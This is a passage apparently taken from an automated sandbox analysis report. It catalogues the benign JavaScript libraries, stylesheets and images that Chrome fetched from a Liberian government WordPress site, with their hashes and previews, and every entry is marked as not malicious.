                                                                                                                        Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/crypto-js@4.1.1/crypto-js.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,(function(){var t,e,r,i,n,o,s,a,c=c||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&"undefined"!=typeof global&&global.crypto&&(r=global.crypto),!r&&"function"==typeof require)try{r=require("crypto")}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.random
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:data
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):9141
                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (20134)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20240
                                                                                                                        Entropy (8bit):5.3169647300574665
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:w7gsUMAY6541hpzXKpGdyZ0yE5kh5/rAdE6Dq3M7YqjDbgD6:agnNEDr9Vkh5cS6WcVYD6
                                                                                                                        MD5:292BCDF90948053977B80F167878EB64
                                                                                                                        SHA1:C22CF9127F7AC360C63D9787648498687D4FE26A
                                                                                                                        SHA-256:82705ACBECDD84306CE33E08F576ECA6A688896895E6E48D1C36A4071FCBA14E
                                                                                                                        SHA-512:64EF1DF25B4516EBF59C69F6394B4DE057B32E343753B2FBA21706C9ACAD1B32F3D14753F3B4FAD0EC46F4BBE3FAF7EF2856A6E6A93DB61586D90123CC9A7097
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Magnific Popup. * 1.1.0 | Dmitry Semenov | MIT | http://dimsemenov.com/plugins/magnific-popup/. */.(function(a){typeof define=="function"&&define.amd?define(["jquery"],a):typeof exports=="object"?a(require("jquery")):a(window.jQuery||window.Zepto)})(function(a){var b="Close",c="BeforeClose",d="AfterClose",e="BeforeAppend",f="MarkupParse",g="Open",h="Change",i="mfp",j="."+i,k="mfp-ready",l="mfp-removing",m="mfp-prevent-close",n,o=function(){},p=!!window.jQuery,q,r=a(window),s,t,u,v,w=function(a,b){n.ev.on(i+a+j,b)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(b,c){n.ev.triggerHandler(i+b,c),n.st.callbacks&&(b=b.charAt(0).toLowerCase()+b.slice(1),n.st.callbacks[b]&&n.st.callbacks[b].apply(n,a.isArray(c)?c:[c]))},z=function(b){if(b!==v||!n.currTemplate.closeBtn)n.currTemplate.closeBtn=a(n.st.closeMarkup.replace("%title%",n.st.tClose)),v=b;return n.currTemplate.clo
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (43235)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):43332
                                                                                                                        Entropy (8bit):5.088989438948185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:6rkk/123F9Ndi68GAFQGpNtYh81+bnDYdXRRM/20YCQCsFSPzdGwKz7RFmYf:CjpFQGpNvXSGwKPiYf
                                                                                                                        MD5:3D6F0BE362F0BC0BAC7F056EC339CC02
                                                                                                                        SHA1:22C45CB29529B5A8A4DAB61FD031E2586811E9CB
                                                                                                                        SHA-256:887AA719FC52054A7695713B2DDA65AB68398C95B43A6785EF4C8009CDFFFFA7
                                                                                                                        SHA-512:6D1D06CC682007A713B8AF87BE820F246A8F44E578F2FD9F57C9869C273934DAB9918A2D0597C2953F96ED6148588954B0C9961BDA984226D2BA0C05D1414B85
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Slider. * Slick.js. * 1.9.0 | Ken Wheeler | http://kenwheeler.github.io | MIT license. */.!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,paus
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):21464
                                                                                                                        Entropy (8bit):5.303481082929494
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                        MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                        SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                        SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                        SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (64288)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):414911
                                                                                                                        Entropy (8bit):5.374473817468575
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:EvQS0prFHxgEH4NHCXH2a8/wLE80v9/lWGaOL+qRd/0cYL993W3R54ipXWit:HS0pBjH4NgMv9XL+qRd/0cYJWR54A
                                                                                                                        MD5:4F49AABCB9CAC352A81C295C1510C888
                                                                                                                        SHA1:502041BE1E19B64812404492397B250BFDC79A39
                                                                                                                        SHA-256:00E2A3B68C38FBDFA457A26636B5CD18E1B4D26DFF61C7D3E46018927E74CBB0
                                                                                                                        SHA-512:D4AF268F4A33C178C2A9022E21483C549B0EF78D672125F15E6220634B04A506B334B895D66D22FAA0B92C1628AE88348832B7B5257D53096546777BB96813CE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2023-03-15..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (59458)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):114706
                                                                                                                        Entropy (8bit):4.924852554644207
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:HaeJuf7Qg5MG7H+qehvP0x2pUk44Q03Pm:Qf7Qg5MG7H+qehvP0x2pUk4T0O
                                                                                                                        MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                                                                                        SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                                                                                        SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                                                                                        SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                                                                                                                        Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2859
                                                                                                                        Entropy (8bit):4.699901090433241
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:4d27MtM7vuC3h8a6Dl1C3vVmYwvuiafnwvG6ZBMfOjHuzv7optGTMkjvR+R0:DYgk/bCfIWaLGvGuJu0
                                                                                                                        MD5:9273AFB5226060534F29E2EFAD7EAA80
                                                                                                                        SHA1:3AE8AAD16159330A39A83E1068273214A4EECD01
                                                                                                                        SHA-256:E31562BBD4B9F377EEC9662B440B0C1262FF73F7E85C3A6E3639635E4516013F
                                                                                                                        SHA-512:7600D06AC0D586EC3048050876AA123F7F32C6653BA00A90701734D22E49DFA95A902781EDF28552EF3697C6099DA9E9EEE48ED3C52BE9E696495D7154C7B688
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * MuffinMenu. *. * Horizontal Multilevel Menu with WP MegaMenu Support. * 3.0 | Muffin Group. */..(function($) {.../* globals jQuery */.. "use strict";.. $.fn.mfnMenu = function(options) {.. var menu = $(this);.. var defaults = {. addLast: false,. arrows: false,. delay: 100,. hoverClass: 'hover',. mobileInit: 768,. responsive: true. };. options = $.extend(defaults, options);.. var init = function() {.. // add '.submenu' class.. $('li:has(ul)', menu).addClass('submenu');.. // append mobile toggle button.. $('li:has(ul)', menu).append('<a class="menu-toggle" href="#" role="link" aria-label="'+ mfn.accessibility.translation.toggleSubmenu +'"></a>').on('click', '.menu-toggle', function(e){.. e.preventDefault();.. // FIX | Header Creative dropdown scroll - nicescroll init. if( $('#Header_creative.dropdown.scroll').length ){. $('#Header_creative').css('overflow-y','visible').css('overflow-y'
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (44186)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):44260
                                                                                                                        Entropy (8bit):5.4668669104082115
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:gXHw8U/5KUTJ4dch4AAAAAATCLL5BI0PRHGrY8VdCCq/3t5IkwC9jRRdyFINGSzY:qwF9XkBtEJHaGgoW
                                                                                                                        MD5:07AE3B6B3B89501942776C01CC7F195A
                                                                                                                        SHA1:B2744F043034B7DFD5732A21748E5868EF882A5F
                                                                                                                        SHA-256:83A0CEF96BEF8FD0B1AE3D260BD2CFA992D821820D435F54FCF274D09726379D
                                                                                                                        SHA-512:1002B348A7B1F8F5C2D14F4E1B5DEBD74E7DCAC8EB8E4244A59A0E3429D96B498144E636F2204E3B165212B515C352F32EBDBE5393E147BCCF08F2A2754549AA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! pako 2.0.4 https://github.com/nodeca/pako @license (MIT AND Zlib) */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).pako={})}(this,(function(t){"use strict";function e(t){let e=t.length;for(;--e>=0;)t[e]=0}const a=256,i=286,n=30,s=15,r=new Uint8Array([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0]),l=new Uint8Array([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13]),o=new Uint8Array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7]),h=new Uint8Array([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),d=new Array(576);e(d);const _=new Array(60);e(_);const f=new Array(512);e(f);const c=new Array(256);e(c);const u=new Array(29);e(u);const w=new Array(n);function b(t,e,a,i,n){this.static_tree=t,this.extra_bits=e,this.extra_base=a,this.elems=i,this.max_length=n,this.has_stree=t&&t.length}let g,p,m;function k(t,e){this.dyn_
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (634)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):52577
                                                                                                                        Entropy (8bit):5.2580583089754285
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:BgPEvfSOqM/MvnRo7o5MDEGfL55jJsDIeJpAHk0vQ:B7wdzGfL5Ds7p+PI
                                                                                                                        MD5:0BA3E2243F42575817B07FCADACF8269
                                                                                                                        SHA1:50ED3259514F428897730C9D429974BDC72EB988
                                                                                                                        SHA-256:6E6C69BA30DA65996FE5CFD06A9248AD71966D7F05781B646D87358A7E202511
                                                                                                                        SHA-512:B135E7CDD316D76EF78702608251A06BDF1F201EF9D9E651F7B24F3246E62E9601359670ADCFE75B0BB7E1741738838728C3B2753E9A193F6C2E7B5356D05673
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7
                                                                                                                        Preview:/*. * jPlayer Plugin for jQuery JavaScript Library. * http://www.jplayer.org. *. * Copyright (c) 2009 - 2013 Happyworm Ltd. * Licensed under the MIT license.. * http://opensource.org/licenses/MIT. *. * Author: Mark J Panaghiston. * Version: 2.5.0. * Date: 7th November 2013. */..(function(b,f){"function"===typeof define&&define.amd?define(["jquery"],f):b.jQuery?f(b.jQuery):f(b.Zepto)})(this,function(b,f){b.fn.jPlayer=function(a){var c="string"===typeof a,d=Array.prototype.slice.call(arguments,1),e=this;a=!c&&d.length?b.extend.apply(null,[!0,a].concat(d)):a;if(c&&"_"===a.charAt(0))return e;c?this.each(function(){var c=b(this).data("jPlayer"),h=c&&b.isFunction(c[a])?c[a].apply(c,d):c;if(h!==c&&h!==f)return e=h,!1}):this.each(function(){var c=b(this).data("jPlayer");c?c.option(a||.{}):b(this).data("jPlayer",new b.jPlayer(a,this))});return e};b.jPlayer=function(a,c){if(arguments.length){this.element=b(c);this.options=b.extend(!0,{},this.options,a);var d=this;this.element.on("remove.jPlayer"
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://mc.yandex.com/sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):482
                                                                                                                        Entropy (8bit):4.626408410219915
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:t41WffFcfbpmO7+iCC4Mfiz9DI9T5VN5Tlp9jyuyuH+/:t414fFmpmOaiCC4MfWRsN19jyHYk
                                                                                                                        MD5:212E30E47232BE03033A87DC58EDAA95
                                                                                                                        SHA1:4D69C4A3DC57503E08B76C774135BFE83E8B1F51
                                                                                                                        SHA-256:1F026BEB67630ABCDBC341651B1C17591AA76261296A9FB118793765964EB4E9
                                                                                                                        SHA-512:13F153263DBF35F91793E8F3FE7249CE87C4854620C2D97F79646C70BBB2F71C5C3759496FFD101FBC6EF9657B19595FE782200649A96473BECD1AD7DAE1F72E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.936 23.877l-5.029-4.65c-1.014-.938-2.596-.875-3.533.138-.937 1.014-.875 2.596.139 3.533l7.209 6.666c.48.445 1.09.665 1.696.665.673 0 1.534-.282 2.099-1.139.332-.506 12.5-19.27 12.5-19.27.751-1.159.421-2.707-.737-3.458z"/></svg>
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (12512), with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12512
                                                                                                                        Entropy (8bit):5.195361378621815
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:wwuf8OQL0sARrAZcNWL//+Ffm/hibLexa2VautyX2fsL3ZHO1O9H:wwuf8OQL0sAZAGNWrGcibLexa2Vau0XD
                                                                                                                        MD5:2E187162915B1D22FD4558FEE30F5613
                                                                                                                        SHA1:3C76D4209FDBCBD3650655852AD4ED73846E15FF
                                                                                                                        SHA-256:6D60E3B25E56D35148888B5A08C8EB0FF3806F9698D4F6F54A35EAB7D27F4C2F
                                                                                                                        SHA-512:01948A902DE67801566637EC99D82302A8DA9B80A31DE08FB1F2C0D52AEA3BEAFA804188471320410850F0E96F4BA4C34F6CAC6EBB6081359F2E959A2C6027C5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (64288)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):414911
                                                                                                                        Entropy (8bit):5.374473817468575
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:EvQS0prFHxgEH4NHCXH2a8/wLE80v9/lWGaOL+qRd/0cYL993W3R54ipXWit:HS0pBjH4NgMv9XL+qRd/0cYJWR54A
                                                                                                                        MD5:4F49AABCB9CAC352A81C295C1510C888
                                                                                                                        SHA1:502041BE1E19B64812404492397B250BFDC79A39
                                                                                                                        SHA-256:00E2A3B68C38FBDFA457A26636B5CD18E1B4D26DFF61C7D3E46018927E74CBB0
                                                                                                                        SHA-512:D4AF268F4A33C178C2A9022E21483C549B0EF78D672125F15E6220634B04A506B334B895D66D22FAA0B92C1628AE88348832B7B5257D53096546777BB96813CE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13
                                                                                                                        Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2023-03-15..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):43527
                                                                                                                        Entropy (8bit):7.98690164688763
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:zccx5nKu48HSqA7vaUnKfJr8pB/4IFCYdK/dwK5sYnE10EUlVsAmL2VXxiQE9faF:zTFnyqb0qJr8p+kTdK/eK5bErojmL21j
                                                                                                                        MD5:B2E38D9F526A427E5B51C362CBE1BB05
                                                                                                                        SHA1:9C05B0B0F7373499A2374EDD800C37AB9720CC88
